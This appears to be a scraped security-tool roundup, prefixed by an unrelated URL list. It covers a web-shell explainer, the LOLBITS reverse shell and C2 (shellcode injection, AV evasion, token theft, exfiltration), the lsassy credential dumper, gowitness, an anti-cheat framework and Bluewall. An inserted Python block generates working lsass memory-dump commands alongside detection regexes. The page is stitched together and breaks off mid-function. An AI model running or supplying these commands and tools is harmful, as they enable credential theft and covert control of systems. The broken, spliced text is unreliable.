[url] https://www.bugcrowd.com/products/platform/vulnerability-rating-taxonomy/
[url] https://www.bugcrowd.com/products/attack-surface-management/
[url] https://www.bugcrowd.com/products/bug-bounty/
[url] https://www.bugcrowd.com/products/vulnerability-disclosure/
[url] https://www.bugcrowd.com/products/next-gen-pen-test/
[url] https://www.bugcrowd.com/products/bug-bash/
[url] https://www.bugcrowd.com/resources/reports/priority-one-report
[url] https://www.bugcrowd.com/solutions/
[url] https://www.bugcrowd.com/solutions/financial-services/
[url] https://www.bugcrowd.com/solutions/healthcare/
[url] https://www.bugcrowd.com/solutions/retail/
[url] https://www.bugcrowd.com/solutions/automotive-security/
[url] https://www.bugcrowd.com/solutions/technology/
[url] https://www.bugcrowd.com/solutions/government/
[url] https://www.bugcrowd.com/solutions/security/
[url] https://www.bugcrowd.com/solutions/marketplace-apps/
[url] https://www.bugcrowd.com/customers/
[url] https://www.bugcrowd.com/hackers/
[url] https://bugcrowd.com/programs
[url] https://bugcrowd.com/crowdstream
[url] https://www.bugcrowd.com/bug-bounty-list/
[url] https://www.bugcrowd.com/hackers/faqs/
[url] https://www.bugcrowd.com/resources/help-wanted/
[url] https://www.bugcrowd.com/hackers/bugcrowd-university/
[url] https://www.bugcrowd.com/hackers/ambassador-program/
[url] https://forum.bugcrowd.com
[subdomain] forum.bugcrowd.com
[url] https://bugcrowd.com/leaderboard
[url] https://www.bugcrowd.com/resources/levelup-0x04
[url] https://www.bugcrowd.com/resources/
[url] https://www.bugcrowd.com/resources/webinars/
[url] https://www.bugcrowd.com/resources/bakers-dozen/
[url] https://www.bugcrowd.com/events/
[url] https://www.bugcrowd.com/resources/glossary/
[url] https://www.bugcrowd.com/resources/faqs/
[url] https://www.bugcrowd.com/about/
[url] https://www.bugcrowd.com/blog
[url] https://www.bugcrowd.com/about/expertise/
[url] https://www.bugcrowd.com/about/leadership/
[url] https://www.bugcrowd.com/about/press-releases/
[url] https://www.bugcrowd.com/about/careers/
[url] https://www.bugcrowd.com/partners/
[url] https://www.bugcrowd.com/about/news/
[url] https://www.bugcrowd.com/about/contact/
[url] https://bugcrowd.com/user/sign_up
[url] https://www.bugcrowd.com/get-started/
[url] https://www.bugcrowd.com/products/attack-surface-management
[url] https://www.bugcrowd.com/products/bug-bounty
[url] https://www.bugcrowd.com/customers/motorola
[url] https://www.bugcrowd.com/products/vulnerability-disclosure
[url] https://www.bugcrowd.com/products/next-gen-pen-test
[url] https://www.bugcrowd.com/resources/guides/esg-research-ciso-security-trends
[url] https://www.bugcrowd.com/events/join-us-at-rsa-2019-march-4-8-2019-san-francisco/
[url] https://www.bugcrowd.com/resources/4-reasons-to-swap-your-traditional-pen-test-with-a-next-gen-pen-test/
[url] https://www.bugcrowd.com/blog/november-2019-hall-of-fame/
[url] https://www.bugcrowd.com/blog/bugcrowd-launches-crowdstream-and-in-platform-coordinated-disclosure/
[url] https://www.bugcrowd.com/blog/the-future-is-now-2020-cybersecurity-predictions/
[url] https://www.bugcrowd.com/press-release/bugcrowd-launches-first-crowd-driven-approach-to-risk-based-asset-discovery-and-prioritization/
[url] https://www.bugcrowd.com/press-release/bugcrowd-university-expands-education-and-training-for-whitehat-hackers/
[url] https://www.bugcrowd.com/press-release/bugcrowd-announces-industrys-first-platform-enabled-cybersecurity-assessments-for-marketplaces/
[url] https://www.bugcrowd.com/news/
[url] https://www.bugcrowd.com/events/appsec-cali/
[url] https://www.bugcrowd.com/events
[url] https://www.bugcrowd.com/bugcrowd-security/
[url] https://www.bugcrowd.com/terms-and-conditions/
[url] https://www.bugcrowd.com/privacy/
[javascript] https://www.bugcrowd.com/wp-content/uploads/autoptimize/js/autoptimize_single_de6b8fb8b3b0a0ac96d1476a6ef0d147.js
[javascript] https://www.bugcrowd.com/wp-content/uploads/autoptimize/js/autoptimize_79a2bb0d9a869da52bd3e98a65b0cfb7.js


Shell Backdoor List - PHP / ASP Shell Backdoor List


What is a shell backdoor ?
A backdoor shell is a malicious piece of code (e.g. PHP, Python, Ruby) that can be uploaded to a site to gain access to files stored on that site. Once it is uploaded, the hacker can use it to edit, delete, or download any files on the site, or upload their own.

How to upload :
Hackers usually take advantage of an upload panel designed for uploading images onto sites. This is usually found once the hacker has logged in as the admin of the site. Shells can also be uploaded via exploits or remote file inclusion, or a virus on the computer.

Uses :
Shells have many uses. They can be used to edit the webserver directory index page of a site, and then hackers can leave their mark or "deface" it for visitors to the site to see when they go to the homepage. Hackers may also use it to bruteforce FTP or cPanel, allowing them more access to the website. Shells can also be used to gain root access to the site. Some hackers may choose to host malware or spyware on the sites they have uploaded their shell to using various exploits.
  • Please note that many shells contain malware and 'Mark / deface page' might contain malware to obtain visitor's password as well.

Prevention :
To prevent a site from having a shell uploaded onto it, a webmaster must always keep up with the latest security updates and make sure to have a secure admin panel. They must also make sure that, if they do have an admin panel, it only permits the user to upload .jpeg, .png, and other image file types.

Shell Backdoor List :

PHP Shell :

ASP Shell :



LOLBITS - C# Reverse Shell Using Background Intelligent Transfer Service (BITS) As Communication Protocol


LOLBITS is a C# reverse shell that uses Microsoft's Background Intelligent Transfer Service (BITS) to communicate with the Command and Control backend. The Command and Control backend is hidden behind an apparently harmless flask web application and is only accessible when the HTTP requests received by the app contain a valid authentication header.

LOLBITS is composed of 3 main elements:
  • The C# agent that is in charge of executing the commands in the compromised host, sending back the output to the C&C server once the process is done.
  • The flask web application that acts as a dispatcher. This element hides the C&C infrastructure behind a harmless website while at the same time supplying new commands to the agent when an authenticated request is received.
  • The C&C console, used to control the agent.
To defeat content inspection by proxies, all the relevant content sent between the agent and the C&C server is encrypted using RC4 with a preshared secret key. A high level view of the infrastructure's behaviour is shown in the following diagram:


To prevent the Blue Team from replaying old requests and discovering the C&C infrastructure, each authentication header is generated randomly and is valid for one single cycle only (a cycle is composed of a POST request followed by a GET request). Old authentication headers are ignored and the harmless website is displayed for those requests.

Acknowledgements
Some of this tool's features were implemented by reusing code from CyberVaca's amazing project Salsa Tools, so a big shout-out to him! Here you can find him:

Getting Started

Prerequisites
The C&C infrastructure requires Windows Server 2012 or above with Python 3.4+ and the following Python dependencies:
  • Colorama
pip install colorama
  • Flask
pip install flask
The C# agent has been successfully tested on Windows Server 2016, Windows Server 2019, Windows 8.1 and Windows 10. Compiling it requires:
  • Visual Studio 2017 or above.
  • .NET Framework 4.5 or above.

Setup
1.- Clone this repository on your C&C server
git clone https://github.com/Kudaes/LOLBITS.git
2.- Install Web Server (IIS) through Windows Server Manager. Make sure to install CGI, ASP.NET and .NET Extensibility roles.


Also install .NET Framework and BITS features for IIS.


3.- Install wfastcgi and configure the FastCGI settings in IIS. This is required since our web application is written in Python. For this step I followed this amazing tutorial, and I recommend you do the same. Come back to this README when you have completed the tutorial's steps 1 and 2.
4.- Stop the Default website and create a new one using Internet Information Services Manager. Enable BITS uploads for this new website.


5.- Move the content of the C&C folder of this repository to the physical directory where the new website is deployed. Let's say that you have created the new website pointing to your directory C:\inetpub\wwwroot\bits; then the directory tree should look like this:
C:\inetpub\wwwroot\bits
|__ /config
|    |-- auth.txt
|__ /files
|    |-- abcde1234
|    |-- default
|__ /lolbins
|    |-- base64decode.py
|    |-- base64encode.py
|    |-- a lot of other .py files
|__ /templates
|    |-- index.html
|__ /static
|__ /payloads
|-- decrypt.py
|-- encrypt.py
|-- myapp.py
|-- web.config
I recommend granting full access rights to Everyone for the website directory (C:\inetpub\wwwroot\bits in the example) in order to avoid all kinds of access denied errors. After all, this is just a C&C server...
6.- Edit the web.config file. In this file you have to modify two settings:
  • The scriptProcessor property of the web handler. For that, go back to IIS Manager, click on the IIS server's root node and select FastCGI Settings (you should have configured this when following the tutorial referenced in step 3). The value of the scriptProcessor property must be "Full Path|Arguments".

According to the previous image, my scriptProcessor property should have the value "c:\python3.4\python.exe|c:\python3.4\lib\site-packages\wfastcgi.py".
  • PYTHONPATH, which should point to your website directory, in this case "C:\inetpub\wwwroot\bits".
7.- Modify the initial setup constants.
  • Select the password to use as preshared key. Set its value in:
    • Program.cs -> Password variable.
    • myapp.py -> Password variable.
    • lawlbin.py -> password variable.
  • In the C# agent, set the URL where the Flask application is listening:
    • Program.cs -> Url variable.
  • In myapp.py, set the variables AuthPath, ReadPath and Payloads to the corresponding folders in the website directory.
  • In lawlbin.py (lolbins folder), set the variables baseReadPath and baseWritePath according to your website directory tree.
8.- Compile the agent and execute it on the compromised host. The compilation will generate an exe and an external dependency (Newtonsoft.Json.dll). You can generate a single exe using ILMerge or just send both files. To avoid DEBUG output, compile the project as a Windows Application.


Usage
To obtain the reverse shell, run python lawlbin.py from a cmd prompt on the C&C server and execute the C# agent on the compromised host.
Since this project was born from the ashes of a previous, failed project, some of the old features have been kept. The old project was a shell where all the available commands were executed using exclusively Living off the Land Binaries. That's where the LOL in LOLBITS comes from, and that's why the following features run using exclusively LOLBINS (this could help to bypass AWS and some EDR filters):
  • download: Download a file from a Webdav to the compromised host.
  • copy: Copy a file from a local path to another local path.
  • base64encode: Use base64 encoding over the content of a local file.
  • base64decode: Decode a base64 encoded file.
  • compile: Compile .cs files into exe or dll.
  • execute: Execute different types of files (bat, exe, xml, js, vbs, hta among others). In maintenance!! Broken ATM!!
  • downexec: Download a file from a webdav and execute it. In maintenance!! Broken ATM!!
Although these features could be interesting in some environments (hmm, downloading remote files without using PowerShell? I like it!), I kept them just to reuse part of the old code for the C&C console. Below is a list of some features that I'm sure will be more useful in a regular situation:
  • inject: Download a shellcode (.bin) or DLL (.NET assembly) file from the C&C and execute it in memory. With this command the payload never touches disk unencrypted, avoiding AV detection. Shellcode injection is only implemented for 64-bit processes and can target either the agent's own process or a remote process.
  • psh: Spawn a remote PowerShell version 2 shell. This shell has to be handled by additional software such as netcat (just run nc -lvp <port>).
  • send: Send a file from your C&C to the compromised host. The sent file will be stored on disk, so be careful.
  • getsystem: Attempt to obtain SYSTEM privileges using named pipe impersonation. A high-integrity process is required.
  • impersonate: Attempt to steal an access token from another process in order to "become" another user.
  • runas: Use valid credentials to modify your security context and log in as another (local or domain) user.
  • rev2self: Revert the security context changes performed by getsystem, impersonate or runas.
  • exfiltrate: Send a file from the compromised host to your C&C.
To get usage tips just type help or <somecommand> help. In the future more features will be implemented, so stay tuned!

Contact
My Twitter
My Linkedin


Lsassy - Extract Credentials From Lsass Remotely


Python library to remotely extract credentials. This blog post explains how it works.
You can check the wiki.
This library uses the impacket project to remotely read the necessary bytes of the lsass dump and pypykatz to extract credentials.

Requirements

Installation

From pip
python3.7 -m pip install lsassy

From sources
python3.7 setup.py install

Basic Usage
lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target>

Advanced

Dumping methods
This tool can dump lsass in different ways.
Dumping methods (-m or --method)
  • 0: Try all methods (dll then procdump) to dump lsass, stop on success (Requires -p if dll method fails)
  • 1: comsvcs.dll method, stop on success (default)
  • 2: Procdump method, stop on success (Requires -p)
  • 3: comsvcs.dll + Powershell method, stop on success
  • 4: comsvcs.dll + cmd.exe method

comsvcs.dll method
This method only uses built-in Windows files to extract remote credentials. It uses the MiniDump function exported by comsvcs.dll to dump the lsass process.
This method can only be used when the execution context holds SeDebugPrivilege. That privilege is available in a PowerShell local-admin context or in a cmd.exe SYSTEM context.
Two execution methods can be used:
  1. WMIExec with cmd.exe (no SeDebugPrivilege) or PowerShell (SeDebugPrivilege)
  2. Scheduled task in SYSTEM context (SeDebugPrivilege)

Procdump method
This method uploads procdump.exe from Sysinternals to dump the lsass process. It first tries to execute procdump via WMI; if that fails it creates a remote scheduled task, executes it and deletes it.
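The method table above maps onto a small set of well-known command lines. The following is an added example (my code, not lsassy's): it turns a -m method number and an optional -p procdump path into the ordered list of dump attempts the README describes, then runs detection regexes for those same artefacts over constructed process-creation command lines, so the block shows both what the tool executes and what a defender should key on. The C:\Windows\Temp dump directory, the 8-hex-character dump name and the cmd.exe-before-PowerShell order inside the comsvcs.dll method are assumptions; the rundll32 comsvcs.dll MiniDump and procdump -ma invocations are the standard forms of those techniques, and the sample events are constructed, not real telemetry.

```python
import re
import secrets
from typing import List, Optional, Tuple

# Added example, not lsassy's own code. Assumptions: dump directory, dump-name
# format and the cmd-before-powershell order within the comsvcs.dll method.
DUMP_DIR = r"C:\Windows\Temp"


def random_dump_name() -> str:
    # The changelog says lsassy uses a random dump name; 8 hex chars is an assumption.
    return f"{secrets.token_hex(4)}.dmp"


def comsvcs_cmd(dump_path: str) -> str:
    # cmd.exe variant: resolve the lsass PID with tasklist, then call the
    # exported MiniDump function of comsvcs.dll through rundll32.
    return (
        'cmd.exe /Q /c for /f "tokens=1,2 delims= " %A in '
        '(\'"tasklist /fi "Imagename eq lsass.exe" | find "lsass""\') do '
        f"rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump %B {dump_path} full"
    )


def comsvcs_powershell(dump_path: str) -> str:
    # PowerShell variant: Get-Process resolves the PID inline.
    return (
        'powershell.exe -NoP -C "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, '
        f'MiniDump (Get-Process lsass).Id {dump_path} full"'
    )


def procdump_cmd(procdump_exe: str, dump_path: str) -> str:
    # Sysinternals procdump: -ma writes a full memory dump of the named process.
    return f"{procdump_exe} -accepteula -ma lsass.exe {dump_path}"


def plan_dump(method: int, procdump_path: Optional[str] = None,
              dump_name: Optional[str] = None) -> List[Tuple[str, str]]:
    """Return the ordered (label, command) attempts for a README -m value."""
    dump_path = f"{DUMP_DIR}\\{dump_name or random_dump_name()}"
    dll_cmd = ("dll/cmd", comsvcs_cmd(dump_path))
    dll_ps = ("dll/powershell", comsvcs_powershell(dump_path))
    procdump = ("procdump", procdump_cmd(procdump_path, dump_path)) if procdump_path else None
    if method == 0:  # dll first; procdump only as a fallback when -p was given
        return [dll_cmd, dll_ps] + ([procdump] if procdump else [])
    if method == 1:
        return [dll_cmd, dll_ps]
    if method == 2:
        if procdump is None:
            raise ValueError("-m 2 requires -p /path/to/procdump.exe")
        return [procdump]
    if method == 3:
        return [dll_ps]
    if method == 4:
        return [dll_cmd]
    raise ValueError(f"unknown method {method}")


# Detection side: the artefacts both dump methods leave in process-creation
# telemetry (Sysmon Event ID 1 or Security 4688 command lines).
DETECTIONS = {
    # MiniDump called by name or by its ordinal (#24) through rundll32 + comsvcs.dll
    "comsvcs_minidump": re.compile(r"comsvcs\.dll\s*,\s*(MiniDump|#24)\b", re.I),
    # procdump / procdump64 pointed at lsass
    "procdump_lsass": re.compile(r"procdump(64)?(\.exe)?\b.*\blsass", re.I),
}

# Constructed command lines, not real telemetry.
SAMPLE_PROCESS_EVENTS = [
    r"C:\Windows\System32\svchost.exe -k netsvcs",
    r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Windows\Temp\a1b2c3d4.dmp full",
    r"rundll32.exe C:\Windows\System32\comsvcs.dll, #24 624 C:\Windows\Temp\x.dmp full",
    r"C:\Tools\procdump64.exe -accepteula -ma lsass.exe C:\Windows\Temp\x.dmp",
]


def flag_lsass_dump(cmdline: str) -> Optional[str]:
    """Return the name of the first matching detection, or None."""
    for name, pattern in DETECTIONS.items():
        if pattern.search(cmdline):
            return name
    return None


def scan_events(events: List[str]) -> List[Tuple[str, str]]:
    """Return (command line, detection name) for every flagged event."""
    hits = []
    for event in events:
        name = flag_lsass_dump(event)
        if name:
            hits.append((event, name))
    return hits


if __name__ == "__main__":
    for label, cmd in plan_dump(0, r"C:\Tools\procdump.exe"):
        print(f"[{label}] {cmd}")
    for event, name in scan_events(SAMPLE_PROCESS_EVENTS):
        print(f"[{name}] {event}")
```

Every command plan_dump produces is caught by flag_lsass_dump, which is the point: whichever -m value the operator picks, the process tree still contains rundll32 + comsvcs.dll or procdump + lsass, and the ordinal form (#24) is covered so that renaming the export call does not evade the rule.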

Examples
lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 0 -p /path/to/procdump.exe
lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 1
lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 2 -p /path/to/procdump.exe
lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 3
lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 4

Remote parsing only
lsassy can parse an already dumped lsass process.
lsassy [--hashes [LM:]NT] --dumppath /share/path/to/dump.dmp [<domain>/]<user>[:<password>]@<target>

CrackMapExec module
I wrote a CrackMapExec module that uses lsassy to extract credentials on compromised hosts.
The CrackMapExec module is in the cme folder: CME Module

Examples

lsassy
# RunDLL Method
lsassy adsec.local/jsnow:Winter_is_coming@dc01.adsec.local

# Procdump Method
lsassy -m 2 -p /tmp/procdump.exe adsec.local/jsnow:Winter_is_coming@dc01.adsec.local

# Remote parsing only
lsassy --dumppath C$/Windows/Temp/lsass.dmp adsec.local/jsnow:Winter_is_coming@dc01.adsec.local

# NT Hash Authentication
lsassy --hashes 952c28bd2fd728898411b301475009b7 Administrator@desktop01.adsec.local

CME Module
crackmapexec smb 10.0.0.0/24 -d adsec.local -u Administrator -p Passw0rd -M lsassy -o BLOODHOUND=True NEO4JPASS=bloodhound

ChangeLog
v1.1.0
------
* Better execution process: --method flag has been added and described in the help text
* Uses a random dump name
* Choose between cmd, powershell, dll and/or procdump methods
* CME module now uses a light lsassy WMIExec and TASKExec implementation
* Bug fixes

v1.0.0
------
* Built-in lsass dump
** Lsass dump using built-in Windows
** Lsass dump using procdump (using -p parameter)
* Add --dumppath to ask for remote parsing only
* Code refactoring
* Add --quiet to quiet output

v0.2.0
------
* Add BloodHound option to CME module (-o BLOODHOUND=True)
- Set compromised targets as "owned" in BloodHound
- Check if compromised users have at least one path to domain admin
* Custom parsing (json, grep, pretty [default])
* New --hashes option to lsassy
* Include CME module in repository
* Add credentials to CME database


v0.1.0
------
First release

Issues
If you find an issue with this tool (that's very plausible!), please
  • Check that you're using the latest version
  • Send as much details as possible.
    • For standalone lsassy, please use the -d debug flag
    • For CME module, please use CrackMapExec --verbose flag

Acknowledgments

Contributors


Gowitness - A Golang, Web Screenshot Utility Using Chrome Headless


gowitness is a website screenshot utility written in Golang that uses Chrome Headless to generate screenshots of web interfaces from the command line. Both Linux and macOS are supported, with Windows support "partially working".
Inspiration for gowitness comes from Eyewitness. If you are looking for something with lots of extra features, be sure to check it out along with these other projects.

Installation
All you need is an installation of the latest Google Chrome or Chromium and gowitness itself. gowitness can be downloaded using go get -u github.com/sensepost/gowitness or using the binaries available for download from the releases page.

Running using docker
To screenshot a page using docker, simply run the following command, which will also pull the latest gowitness image:
docker run --rm -it -v $(pwd)/screenshots:/screenshots leonjza/gowitness:latest single --url=https://www.google.com
Keep in mind that a folder needs to be mounted into the container for gowitness to write your screenshots to, otherwise they will be lost when the container exits. The container is configured with the /screenshots/ directory as the working directory, so the above command mounts a local screenshots/ directory there.
If you want to read an nmap file, save it locally into a screenshots directory, and use it with:
docker run --rm -it -v $(pwd)/screenshots:/screenshots leonjza/gowitness:latest nmap -f /screenshots/nmap.xml
For any other commands, you can get help similar to the local binary install. For example:
docker run --rm -it -v $(pwd)/screenshots:/screenshots leonjza/gowitness:latest -h
A commandline web screenshot and information gathering tool by @leonjza

Usage:
gowitness [command]

Available Commands:
file Screenshot URLs sourced from a file
help Help about any command
nmap Screenshot services from an Nmap XML file
report Work with gowitness reports
scan Scan a CIDR range and take screenshots along the way
single Take a screenshot of a single URL
version Prints the version of gowitness

Build from source
To build gowitness from source, follow the following steps:
  • Ensure that you have at least golang version 1.13.
  • Clone this repository and cd into it.
  • Run go build to get the gowitness binary for the current machine.
  • Or, run make to build for all targets. Binaries will be in the build/ directory.

Usage examples

Screenshot a single website
$ gowitness single --url=https://www.google.com/
This should result in a file being created called: https-www.google.com.png

Screenshot a cidr
$ gowitness scan --cidr 192.168.0.0/24 --threads 20
This should result in many .png images in the current directory when complete. This would also use 20 threads instead of the default of 4.

Generate a report
$ gowitness report generate
This should result in a report.html file with a screenshot report.
$ gowitness report generate --sort-perception
This should result in a report.html file with a screenshot report where screenshots are sorted using perception hashing.
$ gowitness report list
This should list the entries in the gowitness.db file.
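The nmap subcommand above turns an Nmap XML file into screenshot targets. The following added example (my code, not part of gowitness) reimplements that data path in Python: it walks a constructed Nmap XML document, keeps only open web-service ports on hosts that are up, builds one URL per port (preferring the resolved hostname over the IP) and derives a filename in the same shape as the README's https-www.google.com.png. The set of Nmap service names treated as "web" and the exact filename sanitisation rule are assumptions; gowitness's own rules are not shown on this page.

```python
import re
import xml.etree.ElementTree as ET
from typing import List

# Constructed Nmap XML (not a real scan) with one live host exposing HTTP,
# HTTPS on 443, an http-proxy on 8080, SSH and a closed port, plus one host
# that is down.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun>
  <host>
    <status state="up"/>
    <address addr="192.168.0.10" addrtype="ipv4"/>
    <hostnames><hostname name="intranet.example.test" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="443"><state state="open"/><service name="http" tunnel="ssl"/></port>
      <port protocol="tcp" portid="8080"><state state="open"/><service name="http-proxy"/></port>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="8443"><state state="closed"/><service name="https-alt"/></port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.168.0.11" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

# Nmap service names worth a screenshot (assumption; extend as needed).
WEB_SERVICES = {"http", "https", "http-alt", "https-alt", "http-proxy"}


def urls_from_nmap(xml_text: str, prefer_hostnames: bool = True) -> List[str]:
    """Turn open web ports of live hosts into URLs, one per port."""
    urls: List[str] = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        status = host.find("status")
        if status is not None and status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        target = addr.get("addr")
        if prefer_hostnames:
            hostname = host.find("hostnames/hostname")
            if hostname is not None and hostname.get("name"):
                target = hostname.get("name")
        for port in host.iter("port"):
            state = port.find("state")
            service = port.find("service")
            if state is None or state.get("state") != "open" or service is None:
                continue
            name = service.get("name", "")
            if name not in WEB_SERVICES:
                continue
            # Nmap marks TLS either with tunnel="ssl" or with an https* service name.
            scheme = "https" if (service.get("tunnel") == "ssl" or name.startswith("https")) else "http"
            portid = int(port.get("portid"))
            default_port = 443 if scheme == "https" else 80
            suffix = "" if portid == default_port else f":{portid}"
            urls.append(f"{scheme}://{target}{suffix}/")
    return urls


def screenshot_filename(url: str) -> str:
    # Mirrors the README's https-www.google.com.png naming: every run of
    # characters outside [A-Za-z0-9.] becomes one '-', edges trimmed. The
    # exact gowitness rule is not on the page, so this is an approximation.
    return re.sub(r"[^A-Za-z0-9.]+", "-", url).strip("-") + ".png"


if __name__ == "__main__":
    for url in urls_from_nmap(SAMPLE_NMAP_XML):
        print(url, "->", screenshot_filename(url))
```

The resulting URL list can be written one per line and fed to the file subcommand when you want to review or trim the targets before screenshotting, rather than letting the nmap subcommand pick them directly.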


AntiCheat-Testing-Framework - Framework To Test Any Anti-Cheat


Framework to test any Anti-Cheat on the market. It can be used as a template or code base to test any Anti-Cheat and learn along the way. The entry level for reversing Anti-Cheats and cheats is quite high, therefore I'm releasing all the code I developed during my research. The main idea is to help people and motivate them to get into this topic, which is really interesting and still has a lot left to research.
All this code is the result of a research done for Recon2019 (Montreal) and BlackHat Europe 2019 (London).

Twitter: @Niemand_sec
More info: Personal Blog
  • Description for each module can be found on each folder.
  • Modules can be used together or separated.
  • Customization should be simple due to the modularity of the code.

Usage
Most of the settings can be done by using config.ini file, however, some modules may require particular settings on the code, depending on your intentions.
Remember to change location of config.ini file at CheatHelper/CheatHelper.cpp (variable configFile)

Modules (more coming in the future)
  • CheatHelper
  • DriverDisabler
  • DriverHelper
  • DriverTester
  • HandleElevationDriver
  • HandleHijackingDLL
  • HandleHijackingMaster
  • LuaHook
  • StealthHijackingNormalDLL
  • StealthHijackingNormalMaster

About this Project
All this code is a result of the research presented at Recon 2019 and BlackHat Europe 2019: "Unveiling the underground world of Anti-Cheats"
Links:


Bluewall - A Firewall Framework Designed For Offensive And Defensive Cyber Professionals


Bluewall is a firewall framework designed for offensive and defensive cyber professionals. This framework allows Cybersecurity professionals to quickly setup their environment while staying within their scope.

Credit
Inspired by Andrew Benson's hostfw iptable generation script.

Features

Bluewall
* Configure Firewall
* Configure Hostname
* Configure Interface(s)

Supported Operating Systems
* Redhat/CentOS
* Windows configuration can be generated but not executed.

Commandline
*  bluewall -c config/example.ini
** See example configuration

Utils
* Enumerate - Identify live hosts inside your network (coming soon)

Semantics
* Target Host - Outbound communication
* Trusted Host - Bidirectional communication
* No Strike - Devices your computer should not communicate with

Setup
# BUILT FOR PYTHON 2.x
sudo python setup.py install
sudo bluewall -h (for help)

Getting Started
# Setup Initial Environment using Configuration
sudo bluewall -c config/hostconfig.ini

# Export optional windows configuration
sudo bluewall -c config/hostconfig.ini -w autoconfig.ps1

# Add additional inbound host or ranges
sudo bluewall -ih 192.168.0.3,192.168.1.0/24

# Exclude host to communicate with
sudo bluewall -eh 192.168.1.1

# Super easy wizard mode
sudo bluewall --wizard

Help
usage: bluewall [-h] [-V] [-v] [-r] [-p] [-i] [-d] [-w WINDOWS_CONFIG]
[-ot TCP_PORTS_OUT] [-ou UDP_PORTS_OUT] [-it TCP_PORTS_IN]
[-iu UDP_PORTS_IN] [-oh OUTBOUND_HOSTS] [-ih INBOUND_HOSTS]
[-eh EXCLUDE_HOSTS] [-l] [-s] [-q] [-D] [-A] [-F] [-S] [-c CONFIG]
[--info]

/////////////////////////////////////////////////////
| _____ __ _____ _____ _ _ _ _____ __ __ |
| | __ | | | | | __| | | | - | | | | |
| | __-| |__| | | __| | | | | |__| |__ |
| |_____|_____|_____|_____|_____|__|__|_____|_____| |
| |
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
A python framework to automate firewall setup.

Defaults:
Outbound connections will be allowed on all ports to all hosts.
Inbound connections will be limited to related outbound traffic.
DHCP will be enabled.
Ping responses will be enabled.
Unsolicited inbound connections will be dropped.



optional arguments:
-h, --help show this help message and exit
-V, --version Display Version
-v, --verbose Verbose Mode
-r, --reset Send TCP RST instead of dropping packet.
-p, --disallow_ping Disallow incoming PING
-i, --allow_outbound_icmp
Don't restrict ICMP types
-d, --disallow_dhcp Disallow DHCP
-w WINDOWS_CONFIG, --windows_config WINDOWS_CONFIG
Generate Windows Configuration. Usage: bluewall -w
config.ps1
-ot TCP_PORTS_OUT, --tcp_ports_out TCP_PORTS_OUT
Comma separated list of allowed TCP ports outbound
-ou UDP_PORTS_OUT, --udp_ports_out UDP_PORTS_OUT
Comma separated list of allowed UDP ports outbound
-it TCP_PORTS_IN, --tcp_ports_in TCP_PORTS_IN
Comma separated list of allowed TCP ports inbound
-iu UDP_PORTS_IN, --udp_ports_in UDP_PORTS_IN
Comma separated list of allowed UDP ports inbound
-oh OUTBOUND_HOSTS, --outbound_hosts OUTBOUND_HOSTS
Restrict outbound to specified hosts. -oh
192.168.3.0/24,192.168.4.0/24
-ih INBOUND_HOSTS, --inbound_hosts INBOUND_HOSTS
Restrict outbound to specified hosts. -ih
192.168.3.0/24,192.168.4.0/24
-eh EXCLUDE_HOSTS, --exclude_hosts EXCLUDE_HOSTS
Exclude hosts -eh 192.168.3.0/24
-l, --log_exceptions Log Exceptions
-s, --simulate Simulate only.
-q, --quiet Quiet (don't display status messages
-D, --deny_all Absolute Deny all
-A, --allow_all Absolute allow all
-F, --flush Flush IPTables
-S, --show_rules Show rules after setting
--wizard Addressing and firewall wizard mode
-c CONFIG, --config CONFIG
Configuration for firewall
--info About Bluewall

Config Example
example.ini
[local_config]
iface=em1
rh_host=RHEL-Example
rh_ipaddr=192.168.1.42
netmask=255.255.255.0
gateway_addr=172.16.63.1
dns=8.8.8.8
#win_ipaddr=192.168.1.42 - Optional windows IP Address
#
# Optional Windows host (Bluewall will generate a config file for windows)
win_host=WINExample
# MAC Addresses must be ALL CAPS Valid: AA:93:AB:EF:00:01
# rh_mac=* will generate random MAC address
rh_mac=*

[firewall_config]
# Target Range are networks you want to allow outbound communication with.
target_range=172.16.63.0/24
target_range=192.168.2.0/24
#
# Nostrike addresses are devices your computer should NOT communicate with
nostrike=192.168.2.1
#
# Trusted Range are networks you wish to have bi-directional communication with
trusted_range=172.16.63.0/24
trusted_host=42.42.42.42
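The three host classes (target = outbound only, trusted = bidirectional, nostrike = never) only behave as advertised if the rules land in the right order, because iptables is first-match. The following added example (my code, not Bluewall's) parses a config in the README's format, keeping repeated keys such as the two target_range lines that a stock INI parser would collapse, emits the rule order that makes a nostrike address win over an enclosing target range, and includes a first-match evaluator so the result can be checked before anything is applied to a live box. It reproduces only the host/range semantics of the page; the ESTABLISHED,RELATED inbound rule, DHCP and ping handling are left out, and the sample config is constructed.

```python
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed config in the README's format (repeated keys are kept as lists).
SAMPLE_CONFIG = """
[local_config]
iface=em1
rh_ipaddr=192.168.1.42

[firewall_config]
# Target Range: outbound only
target_range=172.16.63.0/24
target_range=192.168.2.0/24
# No Strike: never talk to these
nostrike=192.168.2.1
# Trusted: bidirectional
trusted_range=172.16.63.0/24
trusted_host=42.42.42.42
"""

Net = ipaddress.IPv4Network


@dataclass(frozen=True)
class Rule:
    chain: str            # INPUT or OUTPUT
    net: Optional[Net]    # None means any address
    action: str           # ACCEPT or DROP
    proto: str = "all"    # all, tcp, udp or icmp


def parse_config(text: str) -> Dict[str, Dict[str, List[str]]]:
    """INI-style parser that keeps every occurrence of a repeated key."""
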